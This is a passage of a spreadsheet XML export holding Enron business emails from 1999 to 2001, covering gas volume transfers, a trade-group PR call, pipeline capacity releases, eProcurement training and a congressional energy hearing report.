Phillips Production is also down.._x000D_
_x000D_
For July, I would sell 4, 000 per month supplied by Power Gas Marketing (pool _x000D_
to pool), and 300 MCFD x 1.03 = 309 Dth/day metered production from Phillips _x000D_
Production.  The Phillips Production meters are in CES's pool.  It will cost _x000D_
$100 per transaction to do a pool to pool transfer.  If Paul Leanza can use _x000D_
the gas through November, we should move the Phillips meters to his pool _x000D_
(309/Day).  The Power Gas volumes go through October._x000D_
_x000D_
John_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Dec 2000 01:37:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Conference Call Tomorrow</t>
  </si>
  <si>
    <t xml:space="preserve">Is it 11 a.m. PST or central?  I've got a conflict around 11 a.m. Houston _x000D_
time.  If it's 11 a.m. PST, I can do it.  Let me know.  thx. kd_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Susan J Mara_x000D_
12/07/2000 08:00 AM_x000D_
To: Karen Denne/Corp/Enron@ENRON_x000D_
cc: Jeff Dasovich/NA/Enron@Enron _x000D_
_x000D_
Subject: Conference Call Tomorrow_x000D_
_x000D_
I'll be in the air.  Can one of you call in?_x000D_
----- Forwarded by Susan J Mara/NA/Enron on 12/07/2000 05:59 AM -----_x000D_
_x000D_
	"Katie Kaplan" &lt;kaplan@iepa.com&gt;_x000D_
	12/06/2000 01:54 PM_x000D_
	Please respond to kaplan_x000D_
		 _x000D_
		 To: "Tom Ross" &lt;tross@mcnallytemple.com&gt;, "Sue Mara" &lt;smara@enron.com&gt;, _x000D_
"Stephanie-Newell" &lt;stephanie-newell@reliantenergy.com&gt;, "Rob Lamkin" _x000D_
&lt;rllamkin@seiworldwide.com&gt;, "Richard Hyde" &lt;rwhyde@duke-energy.com&gt;, "Pigott _x000D_
Jack" &lt;jackp@calpine.com&gt;, "Paula Hall-Collins" _x000D_
&lt;paula.hall-collins@williams.com&gt;, "Norton Kelli" _x000D_
&lt;knorton@mcnallytemple.com&gt;, "McNally Ray" &lt;rmcnally@mcnallytemple.com&gt;, _x000D_
"Marty Wilson" &lt;mwilson@pstrategies.com&gt;, "Lynn Lednicky" &lt;lale@dynegy.com&gt;, _x000D_
"Kristin Vellandi" &lt;kvellandi@pstrategies.com&gt;, "kent Palmerton" _x000D_
&lt;kent.palmerton@williams.com&gt;, "Katie Kaplan" &lt;kaplan@iepa.com&gt;, "Kassandra _x000D_
Gough" &lt;kgough@calpine.com&gt;, "Karen Edson" &lt;kedson@ns.net&gt;, "Julee _x000D_
Malinowski-Ball" &lt;jmball@ns.net&gt;, "John Stout" _x000D_
&lt;John_H_Stout@reliantenergy.com&gt;, "Joe Ronan" &lt;joer@calpine.com&gt;, "Jeff _x000D_
Dasovich" &lt;Jeff.Dasovich@enron.com&gt;, "Jean Munoz" &lt;jmunoz@mcnallytemple.com&gt;, _x000D_
"Jan Smutny-Jones" &lt;smutny@iepa.com&gt;, "Greg Blue" &lt;gtbl@dynegy.com&gt;, "Curtis _x000D_
Kebler" &lt;curtis_l_kebler@reliantenergy.com&gt;, "Bob Weisenmiller" _x000D_
&lt;rbw@mrwassoc.com&gt;, "Baker Carolyn" &lt;cabaker@duke-energy.com&gt;, "B Brown Andy" _x000D_
&lt;andybrwn@earthlink.net&gt;, "Andy Brown" &lt;ABB@eslawfirm.com&gt;, "Douglas Kerner" _x000D_
&lt;DKK@eslawfirm.com&gt;_x000D_
		 cc: _x000D_
		 Subject: Conference Call Tomorrow_x000D_
_x000D_
Greetings:_x000D_
_x000D_
My apologies for the delay in sending out this message._x000D_
_x000D_
We will be holding a PR call tomorrow at 11:00 a.m. to discuss this week's_x000D_
session as well as ongoing PR efforts responsive to recent announcements and_x000D_
what we are doing to move forward._x000D_
_x000D_
Agenda Includes:_x000D_
_x000D_
o McNally/Temple Update/Upcoming issues_x000D_
_x000D_
o Edson/Modisette Update/upcoming issues_x000D_
_x000D_
o Upcoming Meetings_x000D_
o Coalition Building_x000D_
_x000D_
The call in number is 888-232-0365_x000D_
Pass code:   111756_x000D_
_x000D_
_x000D_
Let me know if you want to add anything to the rough agenda._x000D_
Thanks!_x000D_
_x000D_
_x000D_
Katie Kaplan_x000D_
Manager of State Policy Affairs_x000D_
Independent Energy Producers Association_x000D_
(916) 448-9499_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 27 Dec 1999 03:22:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Transportation &amp; Storage Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Chris Germany/HOU/ECT on 12/27/99 11:22 _x000D_
AM ---------------------------_x000D_
_x000D_
_x000D_
jwhodge@columbiaenergygroup.com on 12/23/99 02:31:55 PM_x000D_
To: Dan Junek/HOU/ECT@ECT, Chris Germany/HOU/ECT@ECT, "        -         _x000D_
*Goodell, Scott" &lt;sgoodel@columbiaenergygroup.com&gt;_x000D_
cc:  _x000D_
Subject: Transportation &amp; Storage Contracts_x000D_
_x000D_
_x000D_
_x000D_
Attached is the latest file on capacity.  I have updated the C&amp;I list for_x000D_
releases from O&amp;R on Columbia Gulf and TCO, from BUG on TETCO and from LILCO _x000D_
on_x000D_
Transco.  I have updated the Choice list for releases from Atlanta on CNG,_x000D_
Sonat, South Georgia and Transco.   On the Wholesale list, I have reflected _x000D_
the_x000D_
releases that we have made on Columbia Gulf, TCO and TETCO from capacity_x000D_
associated with the Penn Fuel asset management deal and for the release from_x000D_
South Jersey on Transco.  All of these changes are highlighted in blue.  The_x000D_
following releases have not yet taken place for 1/2000, but should happen on_x000D_
Monday or Tuesday:_x000D_
_x000D_
C&amp;I_x000D_
_x000D_
CNG - Release from Hope for sale to Bayer_x000D_
CNG - NiMo customers_x000D_
TCO - Release from Eagle Point for sale to COH customers_x000D_
TETCO - Dayton Power &amp; Light customers_x000D_
Texas Gas - Dayton Power &amp; Light customers_x000D_
Transco - PSNC customers_x000D_
Trunkline - Dayton Power &amp; Light customers_x000D_
_x000D_
_x000D_
Choice_x000D_
_x000D_
East Tennessee - Atlanta customers_x000D_
Midwestern - NIPSCO customers_x000D_
NGPL - NIPSCO customers_x000D_
Tennessee - Atlanta customers_x000D_
_x000D_
If you have any questions, please call Scott Goodell or myself._x000D_
_x000D_
_x000D_
 - Transport Master List for                     Enron.xls_x000D_
</t>
  </si>
  <si>
    <t>Tue, 16 Jan 2001 03:44:00 -0800 (PST)</t>
  </si>
  <si>
    <t xml:space="preserve">This Order_x000D_
_x000D_
Agenda_x000D_
01_x000D_
02_x000D_
03_x000D_
04_x000D_
</t>
  </si>
  <si>
    <t>Thu, 22 Mar 2001 08:33:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'frank.ermis@enron.com', 'jane.tholt@enron.com', 'tori.kuykendall@enron.com', 'susan.scott@enron.com', 'mike.grigsby@enron.com', 'steven.south@enron.com', 'randall.gay@enron.com', 'jay.reitmeyer@enron.com', 'keith.holst@enron.com', 'monique.sanchez@enron.com'})</t>
  </si>
  <si>
    <t>Please Read - New Group Calendar</t>
  </si>
  <si>
    <t xml:space="preserve">Effective today, we have a group calendar.  Please use it to enter your days _x000D_
when you will be out.  If you would prefer to tell me, then I can enter them _x000D_
for you.  Everyone in the West Desk has access to this calendar.  Please _x000D_
utilize it so there is no shock to us assistants when you are not sitting at _x000D_
your desk in the morning and are on vacation or a business trip._x000D_
_x000D_
Also, please let me know when you are gone for the day.  This does not need _x000D_
to be in the calendar, but would be nice to know for phone call purposes._x000D_
_x000D_
Just click on this link and  the icon will be added  to your desk top._x000D_
_x000D_
Many thanks,_x000D_
Ina Rangel_x000D_
-_x000D_
_x000D_
West Desk Calendar =&gt; _x000D_
</t>
  </si>
  <si>
    <t>Thu, 29 Nov 2001 09:33:20 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mara.bronstein@enron.com'})</t>
  </si>
  <si>
    <t>Financial Products</t>
  </si>
  <si>
    <t>Here is the list of gas and power products we would like to see on the screen._x000D_
_x000D_
 _x000D_
_x000D_
Call me if you have any questions_x000D_
Stephane Brodeur_x000D_
(403) 974-6721</t>
  </si>
  <si>
    <t>Wed, 7 Mar 2001 05:13:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'mark.schroeder@enron.com', 'jane.wilson@enron.com'})</t>
  </si>
  <si>
    <t>Customs issue</t>
  </si>
  <si>
    <t xml:space="preserve">Got a voicemail from Rob Walls.  They are (have been) looking into it.  </t>
  </si>
  <si>
    <t>Sat, 15 Jan 2000 08:18:00 -0800 (PST)</t>
  </si>
  <si>
    <t>http://www.warwick.ac.uk/fac/soc/CSGR/glob-fin.html</t>
  </si>
  <si>
    <t>Mon, 18 Dec 2000 10:12:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Arizona Public Service Company</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by Rhonda L Denton/HOU/ECT on 12/18/2000 _x000D_
06:15 PM ---------------------------_x000D_
_x000D_
_x000D_
Rhonda L Denton_x000D_
11/08/2000 05:21 PM_x000D_
To: John M Forney/HOU/ECT@ECT, Valarie Sabo/PDX/ECT@ECT, Fran _x000D_
Chang/PDX/ECT@ECT_x000D_
cc:  _x000D_
Subject: Arizona Public Service Company_x000D_
_x000D_
I will add Valarie and Fran to my distribution.  John is already on here._x000D_
---------------------- Forwarded by Rhonda L Denton/HOU/ECT on 11/08/2000 _x000D_
05:23 PM ---------------------------_x000D_
_x000D_
_x000D_
Rhonda L Denton_x000D_
10/10/2000 09:19 AM_x000D_
To: Tim Belden/HOU/ECT@ECT, Dana Davis/HOU/ECT@ECT, Genia _x000D_
FitzGerald/HOU/ECT@ECT, Jeffrey T Hodge/HOU/ECT@ECT, Melissa Ann _x000D_
Murphy/HOU/ECT@ECT, Kyle Schultz/HOU/ECT@ECT, Kim S Theriot/HOU/ECT@ECT, _x000D_
Christi L Nicolay/HOU/ECT@ECT, Leslie Reeves/HOU/ECT@ECT, Gretchen _x000D_
Lotz/HOU/ECT@ECT, Dean Laurent/HOU/ECT@ECT, John D Suarez/HOU/ECT@ECT, Cara _x000D_
Semperger/PDX/ECT@ECT, Christian Yoder/HOU/ECT@ECT, Jan M King/HOU/ECT@ECT, _x000D_
Mike Swerzbin/HOU/ECT@ECT, Mary Hain/HOU/ECT@ECT, Michael _x000D_
Etringer/HOU/ECT@ECT, John Malowney/HOU/ECT@ECT, Elizabeth Sager/HOU/ECT@ECT, _x000D_
Laura Jones/HOU/ECT@ECT, Cyril Price/HOU/ECT@ECT, James E _x000D_
Terrell/HOU/ECT@ECT, Corry Bentley/HOU/ECT@ECT, Matt Lorenz/HOU/ECT@ECT, _x000D_
Thresa A Allen/HOU/ECT@ECT, David Portz/HOU/ECT@ECT, Sharen _x000D_
Cason/HOU/ECT@ECT, Veronica Gonzalez/HOU/ECT@ECT, Kimberly Allen/HOU/ECT@ECT, _x000D_
William S Bradford/HOU/ECT@ECT, Debbie R Brackett/HOU/ECT@ECT, Christopher _x000D_
Smith/HOU/ECT@ECT, Brant Reves/HOU/ECT@ECT, Russell Diamond/HOU/ECT@ECT, John _x000D_
Suttle/HOU/ECT@ECT, Tanya Rohauer/HOU/ECT@ECT, Rod Nelson/HOU/ECT@ECT, _x000D_
Stephanie Piwetz/HOU/ECT@ECT, Tom Moran/HOU/ECT@ECT, Leslie _x000D_
Hansen/HOU/ECT@ECT, Russell T Kelley/HOU/ECT@ECT, Stewart Rosman/HOU/ECT@ECT, _x000D_
Holli Krebs/HOU/ECT@ECT, Paul Choi/SF/ECT@ECT, Chris H Foster/HOU/ECT@ECT, _x000D_
Sean Crandall/PDX/ECT@ECT, Diana Scholtes/HOU/ECT@ECT, Paul Mead/PDX/ECT@ECT, _x000D_
Jeff Richter/HOU/ECT@ECT, Phillip Platter/HOU/ECT@ECT, Smith L _x000D_
Day/HOU/ECT@ECT, Robert Badeer/HOU/ECT@ECT, D Brett Hunsucker/HOU/ECT@ECT, _x000D_
Kim Ward/HOU/ECT@ECT, John M Forney/HOU/ECT@ECT, Edward D _x000D_
Baughman/HOU/ECT@ECT, Kayne Coulter/HOU/ECT@ECT, John Kinser/HOU/ECT@ECT, _x000D_
Robert Benson/Corp/Enron@Enron, Larry Valderrama/HOU/ECT@ECT, Paul J _x000D_
Broderick/HOU/ECT@ECT, Edward Sacks/Corp/Enron@Enron, Janet H _x000D_
Moore/HOU/ECT@ECT, Janice R Moore/HOU/ECT@ECT, Shari Stack/HOU/ECT@ECT, Kevin _x000D_
M Presto/HOU/ECT@ECT, Rogers Herndon/HOU/ECT@ect, Jesse Bryson/HOU/ECT@ECT, _x000D_
Stanley Cocke/PDX/ECT@ECT, Michael M Driscoll/PDX/ECT@ECT, Doug _x000D_
Gilbert-Smith/Corp/Enron@ENRON, Kimberly Hundl/Corp/Enron@Enron, Joy _x000D_
Werner/Corp/Enron@ENRON, Elsie Lew/HOU/ECT@ECT, Dan Houston/Corp/Enron@Enron, _x000D_
Amy Horton/Corp/Enron@ENRON, Kim Durham/HOU/ECT@ECT, Rhonda _x000D_
Robinson/HOU/ECT@ECT, Rudy Acevedo/HOU/ECT@ECT, Diana Allen/Corp/Enron@ENRON, _x000D_
Ted Ballinger/NA/Enron@Enron, Don Baughman/HOU/ECT@ECT, Lisa _x000D_
Burnett/Corp/Enron@Enron, Carla Hoffman/PDX/ECT@ECT, Mark Guzman/PDX/ECT@ECT, _x000D_
Larry F Campbell/NA/Enron@Enron, Mike Carson/Corp/Enron@Enron, Alan _x000D_
Chen/Corp/Enron@Enron, Jason Choate/Corp/Enron@ENRON, Lawrence _x000D_
Clayton/Corp/Enron@Enron, Kevin Cline/Corp/Enron@Enron, Terri _x000D_
Clynes/HOU/ECT@ECT, Keith Comeaux/Corp/Enron@Enron, Karla _x000D_
Compean/HOU/ECT@ECT, Jason Crawford/Corp/Enron@Enron, Mike Curry/HOU/ECT@ECT, _x000D_
Oscar Dalton/HOU/ECT@ECT, Clint Dean/Corp/Enron@Enron, Todd _x000D_
DeCook/Corp/Enron@Enron, George Diaz/Corp/Enron@ENRON, Tom Dutta/HOU/ECT@ECT, _x000D_
Joe Errigo/Corp/Enron@Enron, David Fairley/HOU/ECT@ECT, Miguel L _x000D_
Garcia/NA/Enron@ENRON, Gerald Gilbert/HOU/ECT@ECT, Joe _x000D_
Gordon/Corp/Enron@Enron, Brent Hebert/HOU/ECT@ect, Juan _x000D_
Hernandez/Corp/Enron@ENRON, Wayne Herndon/Corp/Enron@ENRON, Jim _x000D_
Homco/HOU/ECT@ECT, George Hopley/HOU/ECT@ect, Richard Hrabal/HOU/ECT@ect, _x000D_
Rika Imai/NA/Enron@Enron, Alton Jackson/Corp/Enron@Enron, Larry _x000D_
Jester/Corp/Enron@ENRON, Gary Justice/NA/Enron@Enron, MICHAEL _x000D_
KELLY/ENRON@Gateway, Grace Kim/NA/Enron@Enron, Jeff King/Corp/Enron@Enron, _x000D_
Madhup Kumar/Corp/Enron@ENRON, Justin Laverell/Corp/Enron@ENRON, Chris _x000D_
Lenartowicz/Corp/Enron@ENRON, Peter Makkai/NA/Enron@Enron, Dave _x000D_
Mangskau/Corp/Enron@ENRON, Posey Martinez/HOU/ECT@ECT, Tom _x000D_
May/Corp/Enron@Enron, Keller Mayeaux/Corp/Enron@Enron, Doug _x000D_
Miller/Corp/Enron@Enron, Jeffrey Miller/NA/Enron@Enron, Narsimha _x000D_
Misra/NA/Enron@Enron, Steve Olinde/Corp/Enron@Enron, Andy _x000D_
Pace/NA/Enron@Enron, Juan Padron/NA/Enron@Enron, Ricardo _x000D_
Perez/NA/Enron@Enron, Joseph Piotrowski/NA/Enron@Enron, Joe _x000D_
Quenet/NA/Enron@Enron, Bill Rust/HOU/ECT@ECT, David Ryan/Corp/Enron@ENRON, _x000D_
Eric Saibi/Corp/Enron@ENRON, Zachary Sampson/NA/Enron@ENRON, Anna _x000D_
Santucci/NA/Enron@Enron, Janelle Scheuer/HOU/ECT@ECT, Erik _x000D_
Serio/Corp/Enron@Enron, Doug Sewell/HOU/ECT@ECT, Robert _x000D_
Stalford/NA/Enron@Enron, Chad Starnes/Corp/Enron@Enron, Joe _x000D_
Stepenovitch/Corp/Enron@Enron, Tom Swank/HOU/ECT@ECT, Mark _x000D_
Symms/Corp/Enron@ENRON, Paul Thomas/EU/Enron@Enron, Greg _x000D_
Trefz/Corp/Enron@ENRON, Maria Valdes/Corp/Enron@Enron, Joseph _x000D_
Wagner/NA/Enron@Enron, Christopher Watts/NA/Enron@Enron, Lloyd _x000D_
Will/HOU/ECT@ECT, Jay Wills/Corp/Enron@ENRON, George Wood/Corp/Enron@Enron, _x000D_
Alex Wong/Corp/Enron@Enron, Tracy Ngo/PDX/ECT@ECT_x000D_
cc:  _x000D_
Subject: Arizona Public Service Company_x000D_
_x000D_
_x000D_
Arizona Public Service Company is moving its bulk power marketing to PINNACLE _x000D_
WEST CAPITAL CORPORATION.  Credit and Legal have approved us to trade with _x000D_
this entity for deals less than one year in length,_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 14 Jun 2001 16:48:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'ibuyit.corp@enron.com'})</t>
  </si>
  <si>
    <t>eProcurement Learning Options</t>
  </si>
  <si>
    <t>eProcurement_x000D_
_x000D_
As previously announced, Corporate and Enron Wholesale Services will use _x000D_
eProcurement to create and approve purchase requests for IT hardware and _x000D_
office supplies beginning July 2._x000D_
_x000D_
The purpose of this e-mail is to share the available eProcurement learning _x000D_
options.  You decide what option(s) works best for you.  _x000D_
_x000D_
* Houston eProcurement System Demonstrations (1.5 hr overview) Registration _x000D_
Now Open!_x000D_
Register at &lt;http://iscedcenter.enron.com&gt;_x000D_
_x000D_
* Houston eProcurement Requestor Instructor-Led Classes (3 hr hands-on) _x000D_
Registration Now Open!_x000D_
Register at &lt;http://iscedcenter.enron.com&gt;_x000D_
_x000D_
* NEW! Online, Interactive eProcurement Courses Available June 18!_x000D_
Access Requestor and Approver courses from &lt;http://iscedcenter.enron.com&gt;_x000D_
_x000D_
* Electronic Quick Reference Cards and Step-by-Step Documentation Available _x000D_
June 18!   _x000D_
Access from &lt;_x000D_
http://sap.enron.com/sap_doclib/user/file_list.asp?cabinet_id=205&gt; _x000D_
_x000D_
Over the next three weeks, you will receive additional information to help _x000D_
you transition to the new system:_x000D_
*  How iBuyit eProcurement will impact your purchase activities_x000D_
*  Where to get help_x000D_
*  Logon information and quick reference cards_x000D_
_x000D_
Questions?_x000D_
For general information about iBuyit, send an e-mail to &lt;&lt;_x000D_
mailto:ibuyit@enron.com&gt;&gt;.</t>
  </si>
  <si>
    <t>Wed, 29 Nov 2000 03:11:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Re: Fax number question</t>
  </si>
  <si>
    <t xml:space="preserve">Stevens-_x000D_
_x000D_
I haven't heard back from our accounting group on what their fax number is.  _x000D_
In the meantime, you can just fax the invoice to me at 713-646-8453._x000D_
_x000D_
Susan_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Stevens_Hollister@eott.com on 11/28/2000 01:39:51 PM_x000D_
To: "Susan W Pereira" &lt;Susan.W.Pereira@enron.com&gt;_x000D_
cc: Jeananne_Heck@eott.com _x000D_
Subject: Fax number question_x000D_
_x000D_
_x000D_
_x000D_
Susan,_x000D_
_x000D_
Could you please provide a fax number for our invoice?_x000D_
_x000D_
Thanks,_x000D_
_x000D_
Stevens_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Thu, 19 Oct 2000 02:11:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'chris.norris@enron.com', 'ross.newlin@enron.com'})</t>
  </si>
  <si>
    <t xml:space="preserve">Here are the questions and document requests from DPL.  Don and I are gong _x000D_
through them this morning and will give you guys a call later today for more _x000D_
info.  Thanks for your help with these._x000D_
Ben_x000D_
---------------------- Forwarded by Benjamin Rogers/HOU/ECT on 10/19/2000 _x000D_
09:07 AM ---------------------------_x000D_
_x000D_
_x000D_
Dplflan@aol.com on 10/18/2000 06:18:51 PM_x000D_
To: Benjamin.Rogers@enron.com_x000D_
cc:  _x000D_
Subject: (no subject)_x000D_
_x000D_
_x000D_
Ben-_x000D_
This is a lengthy info/doc request - please give me feedback on how best we_x000D_
can close the loop._x000D_
_x000D_
Thanks_x000D_
Susan Flanagan_x000D_
_x000D_
 - DocReq 001013b.doc_x000D_
</t>
  </si>
  <si>
    <t>Thu, 3 May 2001 10:49:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'john.shelk@enron.com'})</t>
  </si>
  <si>
    <t>frozenset({'linda.robertson@enron.com', 'james.steffes@enron.com', 'mark.palmer@enron.com', 'richard.shapiro@enron.com', 'steven.kean@enron.com'})</t>
  </si>
  <si>
    <t>House and Senate Energy Hearings Today on California/Western_x000D_
 Electric Situation</t>
  </si>
  <si>
    <t>I attended both the House and Senate energy committee hearings today.  House _x000D_
hearing was in the Barton Subcommittee (Energy &amp; Air Quality).  Senate _x000D_
hearing was on last week's FERC order on a "soft price cap" and related _x000D_
issues.  The House witnesses were dominated by California officials: Cal _x000D_
Energy Commission, Cal Air Resources Board, Chairman of Gov Davis Generation _x000D_
Implementation Task Force.  In addition, there were witnesses from the _x000D_
Western Area Power Admin and Bonneville PA.  The Senate witnesses were the _x000D_
three FERC commissioners._x000D_
_x000D_
HIghlights_x000D_
_x000D_
Chairman Barton said it is still his intention to try to mark up the Barton _x000D_
bill, H.R. 1647 next week (many on and off the Subcommittee doubt this will _x000D_
happen; we are gathering political intelligence on those prospects and will _x000D_
report back with more information and conclusions once that is done); _x000D_
Chairman Barton also said he may go to California next week._x000D_
There was considerable emphasis at both hearings about the alleged role that _x000D_
higher natural gas prices into California play in the electric power rate _x000D_
increases; several witnesses focused on difference in alleged transportation _x000D_
costs for similar differences between California and non-CA states; FERC at _x000D_
the Senate hearing said that today the commission announced a staff technical _x000D_
conference for later this month on all aspects of the natural gas market as _x000D_
it relates to California; a House member from Southern Illinois coal country _x000D_
attacked California for using only natural gas in its new power plants._x000D_
The House witnesses, primarily BPA but also the California witnesses, _x000D_
attacked the negawatt provision in sec. 102 of the Barton bill; the criticism _x000D_
was that BPA would be forced to purchase power on the open market at a high _x000D_
price since it is short, sell it to the DSIs under contract; let the DSI sell _x000D_
it at market rates and capture the difference; BPA witness said that thus _x000D_
sec. 102 would make it difficult if not impossible to implement their _x000D_
strategy to avoid as much as a 200 percent rate increase on 10/1/01; BPA _x000D_
testimony will make it tough for Members of Congress from that service region _x000D_
to support sec. 102._x000D_
Both hearings also touched on how difficult it would be to actually devise a _x000D_
price cap; at the House hearing, none of those advocating a price cap among _x000D_
the witnesses could answer excellent questions about exactly how this could _x000D_
be done; the witnesses just said "cost plus a reasonable profit" and said _x000D_
leave the details to FERC; at afternoon Senate hearing, Chairman Hebert had _x000D_
the staff bring in 15 boxes from one FP&amp;L case to show how a price cap would _x000D_
take too long to bring any relief to California this summer; he said last _x000D_
week's soft price cap is much better._x000D_
Also on the price cap, Rep. Walden (R-OR)  got the Cal Energy Comm chair to _x000D_
admit that if the price caps had been in place earlier, California would NOT _x000D_
have taken the conservation and new generation steps that it has taken _x000D_
recently. _x000D_
The interplay among the FERC commissioners was much more contentious than it _x000D_
was a House hearing on Tuesday, although it could have been worse; when _x000D_
Senate Chairman Murkowski (R-AK) said that "help is on the way" in the form _x000D_
of the nominees for the two vacancies, Sen. Dorgan (D-ND) made a comment that _x000D_
suggested that the confirmation process will not be smooth; the same concern _x000D_
came from the interplay among the Senators, which was also somewhat _x000D_
contentious at times._x000D_
_x000D_
Please advise if you have any questions or would like further details.</t>
  </si>
  <si>
    <t>Wed, 19 Jan 2000 03:19:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'janet.wallis@enron.com'})</t>
  </si>
  <si>
    <t>HL&amp;P</t>
  </si>
  <si>
    <t xml:space="preserve">The most recent numbers_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 06:35:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'john.paskin@enron.com'})</t>
  </si>
  <si>
    <t>Re: ASE on February 12-13, 2001 in Dallas, TX</t>
  </si>
  <si>
    <t xml:space="preserve">And you and your bride haven't set Dallas as a honeymoon destination???? =_x000D_
=20_x000D_
Your excuse seems to be a good one.  We will miss your presence and=20_x000D_
participation, however.  Enjoy the wedding!!--Sally=20_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
John Paskin_x000D_
01/26/2001 01:55 AM_x000D_
To: Marvia Jefferson/HOU/ECT@ECT_x000D_
cc: Sally Beck/HOU/ECT@ECT, Mike Jordan/LON/ECT@ECT=20_x000D_
Subject: ASE on February 12-13, 2001 in Dallas, TX_x000D_
_x000D_
Marvia_x000D_
_x000D_
Unfortunately I am unable to attend (I am getting married). =20_x000D_
_x000D_
Apologies_x000D_
_x000D_
John_x000D_
---------------------- Forwarded by John Paskin/LON/ECT on 26/01/2001 07:56=_x000D_
=20_x000D_
---------------------------_x000D_
  =20_x000D_
=09Enron Capital &amp; Trade Resources Corp._x000D_
=09_x000D_
=09From:  Sally Beck                           25/01/2001 23:31_x000D_
=09_x000D_
_x000D_
To: Bob M Hall/NA/Enron@Enron, Brent A Price/HOU/ECT@ECT, Leslie=20_x000D_
Reeves/HOU/ECT@ECT, Mary Solmonson/HOU/ECT@ECT, Beth Perlman/HOU/ECT, Peggy=_x000D_
=20_x000D_
Hedstrom/CAL/ECT@ECT, James Scribner/Corp/Enron@Enron, Sheri=20_x000D_
Thomas/HOU/ECT@ECT, William S Bradford/HOU/ECT@ECT, Brenda F=20_x000D_
Herod/HOU/ECT@ECT, D Todd Hall/HOU/ECT@ECT, Thresa A Allen/HOU/ECT@ECT, Sco=_x000D_
tt=20_x000D_
Earnest/HOU/ECT@ECT, Kevin Sweeney/HOU/ECT@ECT, Todd Busby/NA/Enron@Enron,=_x000D_
=20_x000D_
Shona Wilson/NA/Enron@Enron, Robert Superty/HOU/ECT@ECT, Michelle=20_x000D_
Bruce/HOU/ECT@ECT, Vanessa Schulte/Corp/Enron@Enron, Jennifer deBoisblanc=_x000D_
=20_x000D_
Denny/HOU/ECT@ECT, Mark Taylor/HOU/ECT@ECT, Wanda Curry/HOU/EES@EES, Laura =_x000D_
E=20_x000D_
Scott/CAL/ECT@ECT, Beth Apollo/HOU/ECT@ECT, Mike Jordan/LON/ECT@ECT, Steve=_x000D_
=20_x000D_
Whitaker/LON/ECT@ECT, John Paskin/LON/ECT@ECT, Richard Sage/LON/ECT@ECT,=20_x000D_
Andrew Cornfield/LON/ECT@ECT_x000D_
cc: Heather Choate/HOU/ECT@ECT, Chantelle Villanueva/HOU/ECT@ECT, Zionette=_x000D_
=20_x000D_
Vincent/NA/Enron@Enron, Marvia Jefferson/HOU/ECT@ECT, Cherylene=20_x000D_
Westbrook/Enron@EnronXGate, Adrial Boals/Corp/Enron@Enron, Jennifer=20_x000D_
Rosado/NA/Enron@ENRON, Yvette G Connevey/Corp/Enron@ENRON, Mercy=20_x000D_
Gil/NA/Enron@Enron, Salisha Ramos/NA/Enron@Enron, Sue Foust/HOU/ECT@ECT,=20_x000D_
Braedi Craig/NA/Enron@ENRON, Pamela Sonnier/HOU/ECT@ECT, Fiona=20_x000D_
McNaught/LON/ECT@ECT=20_x000D_
_x000D_
Subject: ASE on February 12-13, 2001 in Dallas, TX_x000D_
_x000D_
On January 12, I hosted a brainstorming session at the Four Seasons hotel i=_x000D_
n=20_x000D_
downtown Houston in which we assembled a number of ideas regarding mid and=_x000D_
=20_x000D_
back office services we could offer to the commodity industry.  To complete=_x000D_
 a=20_x000D_
plan for launching this strategic commercial venture, we are hosting an=20_x000D_
integrated design session facilitated by Cap Gemini Ernst &amp; Young (CGEY) at=_x000D_
=20_x000D_
their Accelerated Solutions Environment in Dallas, Texas. =20_x000D_
_x000D_
I am personally extending an invitation to you to participate in this desig=_x000D_
n=20_x000D_
session.  This is a critical two-day event to be held February 12th and 13t=_x000D_
h=20_x000D_
in Dallas, Texas.   This work session is based on a unique approach called =_x000D_
a=20_x000D_
DesignShop=01v.  It is a very focused, activity-driven event that is compos=_x000D_
ed of=20_x000D_
various modules and exercises performed in small and large groups. If you=_x000D_
=20_x000D_
have not attended one of the DesignShops related to SAP, you will likely=20_x000D_
regard this session as different from any working session you have previous=_x000D_
ly=20_x000D_
experienced. The prior DesignShops held in conjunction with SAP have proven=_x000D_
=20_x000D_
to be very successful.  Therefore, we have elected to utilize this same=20_x000D_
methodology on this very critical and strategic venture._x000D_
_x000D_
A limited number of representatives from Enron will be attending.  You were=_x000D_
=20_x000D_
selected to be one of approximately 30 key individuals to participate in th=_x000D_
e=20_x000D_
DesignShop. You are being asked to participate in the full two days with as=_x000D_
=20_x000D_
little distraction or interruption as possible.  The quality of our results=_x000D_
=20_x000D_
depends on each participant being fully engaged and participative for the=_x000D_
=20_x000D_
entire event.   Additionally, you will be relied on in the future to suppor=_x000D_
t=20_x000D_
and communicate our commercial strategy as it is defined at this session. =_x000D_
=20_x000D_
This date was specifically selected to avoid critical operational periods s=_x000D_
o=20_x000D_
that your participation can be maximized. Therefore, please make all=20_x000D_
necessary arrangements at the office to minimize your distractions during=_x000D_
=20_x000D_
these two days._x000D_
_x000D_
Please review the attached information regarding hotel, flight information,=_x000D_
=20_x000D_
and transportation.  Preliminary information as to schedule and environment=_x000D_
